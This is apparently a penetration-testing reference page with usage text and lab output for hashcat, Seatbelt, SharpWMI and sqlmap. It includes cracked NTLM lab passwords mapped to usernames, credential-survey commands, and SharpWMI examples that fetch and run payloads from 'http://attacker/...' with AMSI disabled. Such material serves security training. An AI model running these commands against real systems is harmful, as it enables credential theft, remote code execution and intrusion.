If you still have no idea what just happened, try the following pages:
 
* https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild
* https://hashcat.net/faq/
 
If you think you need help by a real human come to the hashcat Discord:
 
* https://discord.gg/HFS523HGBT

Examples

hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt

This will run hashcat with a workload profile of 3 (second highest) with an attack mode of 0 (as is) against the specified hash file using the provided dictionary.

sec@slingshot:~$ hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
 
31d6cfe0d16ae931b73c59d7e0c089c0:                        
5bd9b7b6fce76d3aabfebee9debaa932:Warrior07               
87e968ead530264915a4b295c57c37d5:Tibbetts3               
5deaec4b57b859c25cdd0513fb7bc750:Patrique2238            
d8d9eee954da5f2d42fe72f862fa493f:Packardbell350          
9b5684b030226a1203e4e7b718a3f9df:Oozle11                 
23d26a03aa7102abce4805d88e568a78:KAMTPS20!!tim           
fe1f27a2561b61511588b0d24e333a7c:Chirmol01               
7a1f1fd59eb2b97041c74748ea6a68f8:BHLMSTz2                
bf459116e5854e34031997be8e13596d:Angels100%              
ca3f0e9ce3188b0602742da2976d6773:2soWht!a                
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:07:12 2022 (11 secs)
Time.Estimated...: Thu Mar 17 02:07:23 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  1243.6 kH/s (0.03ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 11/36 (30.56%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f313233] -> $HEX[042a0337c2a156616d6f732103]
 
Started: Thu Mar 17 02:07:00 2022
Stopped: Thu Mar 17 02:07:24 2022
hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt -r /usr/local/share/doc/hashcat/rules/best64.rule

This is similar to the above command except it uses the permutation rule best64.rule to check permutations of the provided word list.

sec@slingshot:~$ hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt -r /usr/local/share/doc/hashcat/rules/best64.rule
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
INFO: Removed 11 hashes found as potfile entries or as empty hashes.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 1104517568
 
5ae44bf0a1e24c0b1ec96708f30e7b84:Smitten77               
92929561b2758f409df2b4a24a59c6f4:Alphabet23              
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
 
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:14:29 2022 (2 mins, 14 secs)
Time.Estimated...: Thu Mar 17 02:16:43 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt)
Guess.Mod........: Rules (/usr/local/share/doc/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  8011.9 kH/s (1.14ms) @ Accel:256 Loops:77 Thr:1 Vec:8
Recovered........: 13/36 (36.11%) Digests
Progress.........: 1104517568/1104517568 (100.00%)
Rejected.........: 0/1104517568 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-77 Iteration:0-77
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f313233] -> $HEX[04a156616d6f]
 
Started: Thu Mar 17 02:14:28 2022
Stopped: Thu Mar 17 02:16:45 2022
hashcat -w 3 -a 6 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt ?d?d

This is similar to the above commands except it uses attack mode 6 which is masking, and instead of specifying predefined permutation rules, it uses a custom mask at the end of the command.

sec@slingshot:~$ hashcat -w 3 -a 6 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt ?d?d
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
INFO: Removed 13 hashes found as potfile entries or as empty hashes.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 1434438400
 
7ce56170c73f9582fa348db88de2c192:Gathering81             
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:20:46 2022 (1 min, 9 secs)
Time.Estimated...: Thu Mar 17 02:21:55 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt), Left Side
Guess.Mod........: Mask (?d?d) [2], Right Side
Guess.Queue.Base.: 1/1 (100.00%)
Guess.Queue.Mod..: 1/1 (100.00%)
Speed.#2.........: 20964.9 kH/s (0.55ms) @ Accel:256 Loops:100 Thr:1 Vec:8
Recovered........: 14/36 (38.89%) Digests
Progress.........: 1434438400/1434438400 (100.00%)
Rejected.........: 0/1434438400 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-100 Iteration:0-100
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f3132333132] -> $HEX[042a0337c2a156616d6f7321033638]
 
Started: Thu Mar 17 02:20:34 2022
Stopped: Thu Mar 17 02:21:55 2022
hashcat -m 1000 –username –show –outfile-format 2 labs/web01.hashes

This command will show all the NT hashes that we’ve cracked so far for the provided hash file.

sec@slingshot:~$ hashcat -m 1000 --username --show --outfile-format 2 labs/web01.hashes
Guest:
DefaultAccount:
slopez:Tibbetts3
aparker:Oozle11
rgray:KAMTPS20!!tim
wrobinson:Patrique2238
mlara:Packardbell350
lstout:2soWht!a
tandersen:Angels100%
awalker:Chirmol01
mmiller:BHLMSTz2
vcollins:Warrior07
hhopkins:Alphabet23
kcooper:Smitten77
rduarte:Gathering81
hashcat -m 13100 -a 6 /tmp/tickets /opt/passwords/passwords.txt ?d?d?d?d

This will attempt to crack a kerberos service ticket hash using the password list and appending 4 digits to the end.

Blog Posts

seatbelt

Description

Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.

PlatformWindows
Author@harmj0y and @tifkin_ are the primary authors
License3-Clause BSD
URLhttps://github.com/GhostPack/Seatbelt

Usage

                        %&&@@@&&
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*
                        &%%&&&%%%%%        v1.0.0         ,(((&%%%%%%%%%%%%%%%%%,
                         #%%%%##,
 
 
Available commands (+ means remote usage is supported):
 
    + AMSIProviders          - Providers registered for AMSI
    + AntiVirus              - Registered antivirus (via WMI)
      AppLocker              - AppLocker settings, if installed
      ARPTable               - Lists the current ARP table and adapter information (equivalent to arp -a)
      AuditPolicies          - Enumerates classic and advanced audit policy settings
    + AuditPolicyRegistry    - Audit settings via the registry
    + AutoRuns               - Auto run executables/scripts/programs
      ChromeBookmarks        - Parses any found Chrome bookmark files
      ChromeHistory          - Parses any found Chrome history files
      ChromePresence         - Checks if interesting Google Chrome files exist
      CloudCredentials       - AWS/Google/Azure cloud credential files
      CredEnum               - Enumerates the current user's saved credentials using CredEnumerate()
      CredGuard              - CredentialGuard configuration
      dir                    - Lists files/folders. By default, lists users' downloads, documents, and desktop folders (arguments == [directory] [depth] [regex] [boolIgnoreErrors]
    + DNSCache               - DNS cache entries (via WMI)
    + DotNet                 - DotNet versions
      DpapiMasterKeys        - List DPAPI master keys
      EnvironmentPath        - Current environment %PATH$ folders and SDDL information
      EnvironmentVariables   - Current user environment variables
      ExplicitLogonEvents    - Explicit Logon events (Event ID 4648) from the security event log. Default of 7 days, argument == last X days.
      ExplorerMRUs           - Explorer most recently used files (last 7 days, argument == last X days)
    + ExplorerRunCommands    - Recent Explorer "run" commands
      FileInfo               - Information about a file (version information, timestamps, basic PE info, etc. argument(s) == file path(s)
      FirefoxHistory         - Parses any found FireFox history files
      FirefoxPresence        - Checks if interesting Firefox files exist
    + Hotfixes               - Installed hotfixes (via WMI)
      IdleTime               - Returns the number of seconds since the current user's last input.
      IEFavorites            - Internet Explorer favorites
      IETabs                 - Open Internet Explorer tabs
      IEUrls                 - Internet Explorer typed URLs (last 7 days, argument == last X days)
      InstalledProducts      - Installed products via the registry
      InterestingFiles       - "Interesting" files matching various patterns in the user's folder. Note: takes non-trivial time.
    + InterestingProcesses   - "Interesting" processes - defensive products and admin tools
      InternetSettings       - Internet settings including proxy configs and zones configuration
    + LAPS                   - LAPS settings, if installed
    + LastShutdown           - Returns the DateTime of the last system shutdown (via the registry).
      LocalGPOs              - Local Group Policy settings applied to the machine/local users
    + LocalGroups            - Non-empty local groups, "-full" displays all groups (argument == computername to enumerate)
    + LocalUsers             - Local users, whether they're active/disabled, and pwd last set (argument == computername to enumerate)
      LogonEvents            - Logon events (Event ID 4624) from the security event log. Default of 10 days, argument == last X days.
    + LogonSessions          - Windows logon sessions
    + LSASettings            - LSA settings (including auth packages)
    + MappedDrives           - Users' mapped drives (via WMI)
      MicrosoftUpdates       - All Microsoft updates.
      NamedPipes             - Named pipe names and any readable ACL information.
    + NetworkProfiles        - Windows network profiles
    + NetworkShares          - Network shares exposed by the machine (via WMI)
    + NTLMSettings           - NTLM authentication settings
      OfficeMRUs             - Office most recently used file list (last 7 days)
      OSInfo                 - Basic OS info (i.e. architecture, OS version, etc.)
      OutlookDownloads       - List files downloaded by Outlook
      PoweredOnEvents        - Reboot and sleep schedule based on the System event log EIDs 1, 12, 13, 42, and 6008. Default of 7 days, argument == last X days.
    + PowerShell             - PowerShell versions and security settings
      PowerShellEvents       - PowerShell script block logs (4104) with sensitive data.
      Printers               - Installed Printers (via WMI)
      ProcessCreationEvents  - Process creation logs (4688) with sensitive data.
      Processes              - Running processes with file info company names that don't contain 'Microsoft', "-full" enumerates all processes
    + ProcessOwners          - Running non-session 0 process list with owners. For remote use.
    + PSSessionSettings      - Enumerates PS Session Settings from the registry
    + PuttyHostKeys          - Saved Putty SSH host keys
    + PuttySessions          - Saved Putty configuration (interesting fields) and SSH host keys
      RDCManFiles            - Windows Remote Desktop Connection Manager settings files
    + RDPSavedConnections    - Saved RDP connections stored in the registry
    + RDPSessions            - Current incoming RDP sessions (argument == computername to enumerate)
      RecycleBin             - Items in the Recycle Bin deleted in the last 30 days - only works from a user context!
      reg                    - Registry key values (HKLM\Software by default) argument == [Path] [intDepth] [Regex] [boolIgnoreErrors]
      RPCMappedEndpoints     - Current RPC endpoints mapped
    + SCCM                   - System Center Configuration Manager (SCCM) settings, if applicable
    + ScheduledTasks         - Scheduled tasks (via WMI) that aren't authored by 'Microsoft', "-full" dumps all Scheduled tasks
      SearchIndex            - Query results from the Windows Search Index, default term of 'passsword'. (argument(s) == <search path> <pattern1,pattern2,...>
      SecurityPackages       - Enumerates the security packages currently available using EnumerateSecurityPackagesA()
      Services               - Services with file info company names that don't contain 'Microsoft', "-full" dumps all processes
      SlackDownloads         - Parses any found 'slack-downloads' files
      SlackPresence          - Checks if interesting Slack files exist
      SlackWorkspaces        - Parses any found 'slack-workspaces' files
    + Sysmon                 - Sysmon configuration from the registry
      SysmonEvents           - Sysmon process creation logs (1) with sensitive data.
      TcpConnections         - Current TCP connections and their associated processes and services
      TokenGroups            - The current token's local and domain groups
      TokenPrivileges        - Currently enabled token privileges (e.g. SeDebugPrivilege/etc.)
    + UAC                    - UAC system policies via the registry
      UdpConnections         - Current UDP connections and associated processes and services
      UserRightAssignments   - Configured User Right Assignments (e.g. SeDenyNetworkLogonRight, SeShutdownPrivilege, etc.) argument == computername to enumerate
    + WindowsAutoLogon       - Registry autologon information
      WindowsCredentialFiles - Windows credential DPAPI blobs
    + WindowsDefender        - Windows Defender settings (including exclusion locations)
    + WindowsEventForwarding - Windows Event Forwarding (WEF) settings via the registry
    + WindowsFirewall        - Non-standard firewall rules, "-full" dumps all (arguments == allow/deny/tcp/udp/in/out/domain/private/public)
      WindowsVault           - Credentials saved in the Windows Vault (i.e. logins from Internet Explorer and Edge).
      WMIEventConsumer       - Lists WMI Event Consumers
      WMIEventFilter         - Lists WMI Event Filters
      WMIFilterBinding       - Lists WMI Filter to Consumer Bindings
    + WSUS                   - Windows Server Update Services (WSUS) settings, if applicable
 
 
Seatbelt has the following command groups: All, User, System, Slack, Chrome, Remote, Misc
 
    You can invoke command groups with "Seatbelt.exe <group>"
 
   "Seatbelt.exe -group=all" runs all commands
 
   "Seatbelt.exe -group=user" runs the following commands:
 
        ChromePresence, CloudCredentials, CredEnum, dir, DpapiMasterKeys,
        ExplorerMRUs, ExplorerRunCommands, FirefoxPresence, IdleTime,
        IEFavorites, IETabs, IEUrls, MappedDrives,
        OfficeMRUs, PuttyHostKeys, PuttySessions, RDCManFiles,
        RDPSavedConnections, SlackDownloads, SlackPresence, SlackWorkspaces,
        TokenGroups, WindowsCredentialFiles, WindowsVault
 
   "Seatbelt.exe -group=system" runs the following commands:
 
        AMSIProviders, AntiVirus, AppLocker, ARPTable, AuditPolicies,
        AuditPolicyRegistry, AutoRuns, CredGuard, DNSCache,
        DotNet, EnvironmentPath, EnvironmentVariables, Hotfixes,
        InterestingProcesses, InternetSettings, LAPS, LastShutdown,
        LocalGPOs, LocalGroups, LocalUsers, LogonSessions,
        LSASettings, NamedPipes, NetworkProfiles, NetworkShares,
        NTLMSettings, OSInfo, PoweredOnEvents, PowerShell,
        Printers, Processes, PSSessionSettings, RDPSessions,
        SCCM, Services, Sysmon, TcpConnections,
        TokenPrivileges, UAC, UdpConnections, UserRightAssignments,
        WindowsAutoLogon, WindowsDefender, WindowsEventForwarding, WindowsFirewall,
        WMIEventConsumer, WMIEventFilter, WMIFilterBinding, WSUS
 
 
   "Seatbelt.exe -group=slack" runs the following commands:
 
        SlackDownloads, SlackPresence, SlackWorkspaces
 
   "Seatbelt.exe -group=chrome" runs the following commands:
 
        ChromeBookmarks, ChromeHistory, ChromePresence
 
   "Seatbelt.exe -group=remote" runs the following commands:
 
        AMSIProviders, AntiVirus, DotNet, ExplorerRunCommands, Hotfixes,
        InterestingProcesses, LastShutdown, LogonSessions, LSASettings,
        MappedDrives, NetworkProfiles, NetworkShares, NTLMSettings,
        PowerShell, ProcessOwners, PuttyHostKeys, PuttySessions,
        RDPSavedConnections, RDPSessions, Sysmon, WindowsDefender,
        WindowsEventForwarding, WindowsFirewall
 
   "Seatbelt.exe -group=misc" runs the following commands:
 
        ChromeBookmarks, ChromeHistory, ExplicitLogonEvents, FileInfo, FirefoxHistory,
        InstalledProducts, InterestingFiles, LogonEvents, MicrosoftUpdates,
        OutlookDownloads, PowerShellEvents, ProcessCreationEvents, ProcessOwners,
        RecycleBin, reg, RPCMappedEndpoints, ScheduledTasks,
        SearchIndex, SecurityPackages, SysmonEvents

Examples

 seatbelt -q AntiVirus

This will check for installed AntiVirus.

C:\Tools>seatbelt -q AntiVirus
====== AntiVirus ======
 
  Engine                         : Windows Defender
  ProductEXE                     : windowsdefender://
  ReportingEXE                   : %ProgramFiles%\Windows Defender\MsMpeng.exe
seatbelt -q InstalledProducts

This will query WMI for installed software on the system.

C:\Tools>seatbelt -q InstalledProducts
====== InstalledProducts ======
 
  DisplayName                    : BleachBit 4.4.2.2142
  DisplayVersion                 : 4.4.2.2142
  Publisher                      : BleachBit
  InstallDate                    : 1/13/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Google Chrome
  DisplayVersion                 : 99.0.4844.74
  Publisher                      : Google LLC
  InstallDate                    : 3/15/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Icecast v2.0.0
  DisplayVersion                 :
  Publisher                      :
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Edge
  DisplayVersion                 : 99.0.1150.39
  Publisher                      : Microsoft Corporation
  InstallDate                    : 3/14/2022 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Edge Update
  DisplayVersion                 : 1.3.155.85
  Publisher                      :
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Npcap
  DisplayVersion                 : 1.10
  Publisher                      : Nmap Project
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Wireshark 3.4.4 64-bit
  DisplayVersion                 : 3.4.4
  Publisher                      : The Wireshark developer community, https://www.wireshark.org
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
 
  DisplayName                    : Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
  DisplayVersion                 : 12.0.30501.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86
...
 DisplayName                    : Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910
  DisplayVersion                 : 14.28.29910
  Publisher                      : Microsoft Corporation
  InstallDate                    : 4/8/2021 12:00:00 AM
  Architecture                   : x64
 
  DisplayName                    : Java(TM) SE Development Kit 15 (64-bit)
  DisplayVersion                 : 15.0.0.0
  Publisher                      : Oracle Corporation
  InstallDate                    : 9/26/2020 12:00:00 AM
  Architecture                   : x64
seatbelt.exe -q <command> -computername=x.x.x.x -username=<domain>\<user> -password=<password>

This will run a command remotely through RPC.

Blog Posts

SharpWMI

Description

A C# implementation of various WMI functionality.

This implementation is a refurbished and enhanced version of original SharpWMI by @harmj0y that adds some more flexibility for working with malicious VBS scripts, AMSI evasion, file upload purely via WMI and makes it possible to return output from WMI remotely executed commands.

PlatformWindows
AuthorWill Schroeder
License3-Clause BSD
URLhttps://github.com/GhostPack/SharpWMI

Usage

USAGE:
  Local system enumeration:       
    SharpWMI.exe action=query query="select * from win32_service" [namespace=BLAH]
 
  Remote system enumeration:
    SharpWMI.exe action=query [computername=HOST1[,HOST2,...]] query="select * from win32_service" [namespace=BLAH]
 
  Remote system Logged On users enumeration:
    SharpWMI.exe action=loggedon [computername=HOST1[,HOST2,...]]
 
  Remote process creation:
    SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command="C:\\temp\\process.exe [args]" [amsi=disable] [result=true]
 
  Remote VBS execution:
    SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]
 
  File upload via WMI:
    SharpWMI.exe action=upload [computername=HOST[,HOST2,...]] source="C:\\source\\file.exe" dest="C:\\temp\\dest-file.exe" [amsi=disable]
 
  Remote firewall enumeration :
    SharpWMI.exe action=firewall computername=HOST1[,HOST2,...]
 
  List processes:
    SharpWMI.exe action=ps [computername=HOST[,HOST2,...]]
 
  Terminate process (first found):
    SharpWMI.exe action=terminate process=PID|name [computername=HOST[,HOST2,...]]
 
  Get environment variables (all if name not given):
    SharpWMI.exe action=getenv [name=VariableName] [computername=HOST[,HOST2,...]]
 
  Set environment variable:
    SharpWMI.exe action=setenv name=VariableName value=VariableValue [computername=HOST[,HOST2,...]]
 
  Delete an environment variable:
    SharpWMI.exe action=delenv name=VariableName [computername=HOST[,HOST2,...]]
 
  Install MSI file:
    SharpWMI.exe action=install [computername=HOST[,HOST2,...]] path="C:\\temp\\installer.msi" [amsi=disable]
 
NOTE:
  - Any remote function also takes an optional "username=DOMAIN\\user" "password=Password123!".
  - If computername is not specified, will target localhost.
 
VBS Script execution:
  The 'executevbs' action was reworked as compared to the original version of SharpWMI.
  Script specification defined in [script-specification] offers following methods to point this tool at target VBS code:
 
  A) Executes OS command via preset VBS code:
    SharpWMI.exe action=executevbs [...] command="notepad.exe"
 
  B) Downloads Powershell commands from URL and execute them from within VBS via Powershell's StdIn:
    SharpWMI.exe action=executevbs [...] url="http://attacker/myscript.ps1"
 
  C) Download a binary file from given URL, store it in specified path and then execute it:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe"
 
  D) Download a binary file from given URL, store it in specified path and then execute arbitrary command:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe" command="%TEMP%\bar.exe -some -parameters"
 
  E) Read VBS script from file and execute it:
    SharpWMI.exe action=executevbs [...] script="myscript.vbs"
 
  F) Execute given VBS script given literally:
    SharpWMI.exe action=executevbs [...] script="CreateObject(\\"WScript.Shell\\").Run(\\"notepad.exe\\")"
 
  G) Base64 decode input string being encoded VBS script and execute it on remote machine:
    SharpWMI.exe action=executevbs [...] scriptb64="Q3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIi[...]"
 
  H) Read contents of given file, base64 decode them and then execute on target machine:
    SharpWMI.exe action=executevbs [...] scriptb64="myscript.vbs.b64"
 
  Finally, 'executevbs' action may have additional [time-specs] defined in seconds - they specify script trigger and wait timeouts:
    SharpWMI.exe action=executevbs [...] trigger=5 timeout=10
 
 
EXAMPLES:
 
  SharpWMI.exe action=query query="select * from win32_process"
 
  SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\\SecurityCenter2"
 
  SharpWMI.exe action=loggedon computername=primary.testlab.local
 
  SharpWMI.exe action=query computername=primary.testlab.local query="select * from win32_service"
 
  SharpWMI.exe action=query computername=primary,secondary query="select * from win32_process"
 
  SharpWMI.exe action=exec computername=primary.testlab.local command="powershell.exe -enc ZQBj..."
 
  SharpWMI.exe action=exec computername=primary.testlab.local command="whoami" result=true amsi=disable
 
  SharpWMI.exe action=executevbs computername=primary.testlab.local command="notepad.exe" eventname="MyLittleEvent" amsi=disable
 
  SharpWMI.exe action=executevbs computername=primary.testlab.local username="TESTLAB\\harmj0y" password="Password123!"
 
  SharpWMI.exe action=upload computername=primary.testlab.local source="beacon.exe" dest="C:\\Windows\\temp\\foo.exe" amsi=disable
 
  SharpWMI.exe action=terminate computername=primary.testlab.local process=explorer
 
  SharpWMI.exe action=getenv name=PATH computername=primary.testlab.local
 
  SharpWMI.exe action=setenv name=FOO value="BAR" computername=primary.testlab.local
 
  SharpWMI.exe action=delenv name=FOO computername=primary.testlab.local
 
  SharpWMI.exe action=install computername=primary.testlab.local path="C:\\temp\\installer.msi"

Examples

Blog Posts

sqlmap

Description

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

PlatformAll
AuthorSqlmap Project
LicenseGPLv3
URLhttps://sqlmap.org

Usage

        ___
       __H__                                                                                                                                                                                                                              
 ___ ___[(]_____ ___ ___  {1.6#stable}                                                                                                                                                                                                    
|_ -| . ["]     | .'| . |                                                                                                                                                                                                                 
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                                 
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                              
 
Usage: python3 sqlmap [options]
 
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
 
  Target:
    At least one of these options has to be provided to define the
    target(s)
 
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -d DIRECT           Connection string for direct database connection
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file
 
  Request:
    These options can be used to specify how to connect to the target URL
 
    -A AGENT, --user..  HTTP User-Agent header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --live-cookies=L..  Live cookies file used for loading up-to-date values
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --mobile            Imitate smartphone through HTTP User-Agent header
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
